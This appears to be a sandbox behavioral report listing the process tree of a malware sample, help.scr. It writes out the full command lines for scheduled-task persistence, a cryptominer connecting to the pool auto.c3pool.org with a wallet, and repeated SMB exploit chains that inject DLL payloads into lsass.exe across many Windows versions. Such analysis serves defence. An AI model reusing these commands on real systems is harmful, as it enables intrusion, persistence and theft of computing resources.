| ZeroBOX

Behavioral Analysis

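Process tree (each entry shows the process image name followed by its full command line as observed in the sandbox; the number on the line beneath it is the process ID)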

  • help.scr "C:\Users\test22\AppData\Local\Temp\help.scr"

    1532
    • cmd.exe cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F

      2536
    • cmd.exe cmd /c taskkill /f /im spreadTpqrst.exe&&exit

      2624
    • spreadTpqrst.exe C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

      2928
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP0SP1_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      3428
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP2SP3_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      3464
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP1_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      3512
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP2_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      3616
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      3724
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      3832
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      3952
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target VISTA_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      1956
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target VISTA_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      3588
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target VISTA_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      3808
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      4088
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      4208
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      4436
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target WIN7_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      4584
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target WIN7_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      4908
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      5096
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      5148
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target WIN8_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      5876
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostlong.exe --TargetIp 192.168.56.101 --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.101.txt&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      6232
    • cmd.exe cmd /c cd C:\ProgramData\&&svchostlong.exe --TargetIp 192.168.56.101 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.101.txt&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      4648
